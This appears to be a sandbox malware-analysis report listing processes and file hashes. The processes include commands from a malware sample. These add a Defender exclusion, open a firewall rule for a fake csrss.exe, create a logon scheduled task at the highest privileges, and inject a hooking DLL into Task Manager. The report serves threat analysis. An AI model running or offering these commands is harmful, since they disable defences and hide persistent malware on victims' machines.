"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4440,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4464 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4168,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4328 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4336,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3676 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4964 /prefetch:8
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5220,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5232 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1585e1028b0.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1585e1028b0.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /306-306
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4672 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5228,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4696 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5332 /prefetch:8
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4768,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5232 /prefetch:8
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5252,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5428 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5260,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4820 /prefetch:8
Network
Files
memory/1044-613-0x0000000006800000-0x0000000006814000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 08dba1f0a0112675b989061b19b4f8cb |
| SHA1 | fa69a22240e6540e688649b9b72cdbf95fd024ce |
| SHA256 | 3ca619ef086ecdd13983a9f7111090994b06fa277afd08f69593b93a648915da |
| SHA512 | f24ec49bfed17c91df991c30d766242d92a0ec203aad39e308082c949275e4db5f2ef0d0dcb032d8cd698e2aa93e94649488902b7778d74a403dab404fa95ed8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 0d02d5062a9f7ae5cef683bafef2f6e7 |
| SHA1 | d2dd1b8325a7279da0076633d181ad2a037f7445 |
| SHA256 | 8a55f2c663c4d9312c0ba1378f0f3448da483a5c3b83aafcf7c127c95b827be3 |
| SHA512 | f9e1a27fda8716d1cb6065dfd0a0112843473ad434a2091a00fad3dbcc849378bced853ac28f7959d448b4e5c13bf4aa9e4d928c9de86cb786c04a32dde65915 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 3a65a8bbb1e29108d6e565db9f9ae6ab |
| SHA1 | baecd4cac923ab6119038cc7f18a1528ac5ce539 |
| SHA256 | 652187d61ae38254a17f2afacb804e30c57acb9913329cffa21489b2ee34afb5 |
| SHA512 | f006f9ba640054b31ac74be0ccbe3ad3425518cbbca8affd13ad3159d6985c9d393ed39f406168292adff7aa30fe1e9e08c5fef9cae8ec7e9b233ac422e634db |
C:\Users\Admin\AppData\Local\Temp\scoped_dir3760_1117502161\CRX_INSTALL\_locales\en_CA\messages.json
| MD5 | 558659936250e03cc14b60ebf648aa09 |
| SHA1 | 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825 |
| SHA256 | 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b |
| SHA512 | 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2c790efbd974611919a1aba2aa83ced1 |
| SHA1 | f9f52482a6fdccfec78d36172e7fff52bae86490 |
| SHA256 | ea7d50af5fca6b397aa8553fa399441074fc7b777ae089680e55ed6b757820fb |
| SHA512 | 06b5c661e201c6d5f96320d9566f3da74b0b414b6fc03d482441ce3c1a739ae0ffe0771a23e6c7431b71d26088e98eb90d09f3539f9033c9be7967c261b27ade |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 2cae42deb57cb67df8a88f16ac7774bb |
| SHA1 | ee5239aeea98d7795a4c37ae1af9792e5e86a488 |
| SHA256 | 6c82185828fa4d5693ddc329731964b1380d4e2ce7585306d63136318c758530 |
| SHA512 | b6d8b672560e9019f884845bedf2a0802084c91bf6808808f905ef3267d28f6eafdaedcc901bfbd2aa50248092a5fa38662dcdda1fb347619aed1c0b9b78ceed |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\dasherSettingSchema.json
| MD5 | 4ec1df2da46182103d2ffc3b92d20ca5 |
| SHA1 | fb9d1ba3710cf31a87165317c6edc110e98994ce |
| SHA256 | 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6 |
| SHA512 | 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\_locales\en_CA\messages.json
| MD5 | 07ffbe5f24ca348723ff8c6c488abfb8 |
| SHA1 | 6dc2851e39b2ee38f88cf5c35a90171dbea5b690 |
| SHA256 | 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c |
| SHA512 | 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 0b88b633fb1128e5f68c8dbf81c9a533 |
| SHA1 | 45d22de3dfd67192adf86dc9482c4c8fa70803ec |
| SHA256 | 4904b6279d330be4101771dfeffe553bc82557b8d6b19df0460fb49ec19085f1 |
| SHA512 | 981ec5393f215f80b2e942e905c74b7c6f62f994b7c5bc4a54882b758d9677cbe3540a81d61ba0e01002248a37ccdb7b28f332d354f79fd90f5138b98230ad67 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 8997105219bdd9c738b60b8e270fee22 |
| SHA1 | c676c7a5bc15a54e1a22d1a45dce2eadc8c5583d |
| SHA256 | 8ca5f012e0c09bddea0b56acd39098566c39dcf8fa34eb6f4400e4884153888e |
| SHA512 | 80a6ebc7e4de6a1bc2b35706734f2f25ea13db2a3c83a7a543b2f04a787a6bd92676b1abe0cbf9976549065d68a3c97d4ed172d804208afd8358d5b2b42ac479 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 962832d464be9f210b833b08ed4301f9 |
| SHA1 | 6d45e43940665048d66c7fa256cc1cef8a067e02 |
| SHA256 | 86b8c4e83fcd754ddfdfb76b363a5efeb5f5e916d0befab47d837145b10b05f5 |
| SHA512 | d7e54b98c98679a3d8d855e03eae0ae600ba10bd40ed19e8f9ae97dbbffddd69420492ee0c1a4a951771190628f15447304ca4ebfbf4c3eb86714829e5c06898 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 473651af18fcd8727a516672995bae75 |
| SHA1 | 309568fb89ae3c8de98ffde747ace6ee36ecb5ab |
| SHA256 | a57f372c2d6e23a5a9bceb9f921b6cb51b378bf8867b2aa64038c4b765aceaa1 |
| SHA512 | 5496248a624e66c10afbb4133b2849aadbf16953f3928f9b2a8594a199173b713918eaeba8de7824ab0c98e3482600086e7491cdfdb08267f50216c58e916eef |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 6422b2d1ecfabc8603d110c7419d9f50 |
| SHA1 | a5cb98066a11a19d28abece1d4510c50b8f7686e |
| SHA256 | d283c3177857e8d0aa9216a4066f58a62c2bca6c817aace91ea71a9697e29e04 |
| SHA512 | 9135d747906d8c01b68459f47caa120e104b1b0ab62f5e60a4782d6f25b86bda823635285466c00576dbe71b99556c40c27f51af187a406dad96c88e7ae4b0d2 |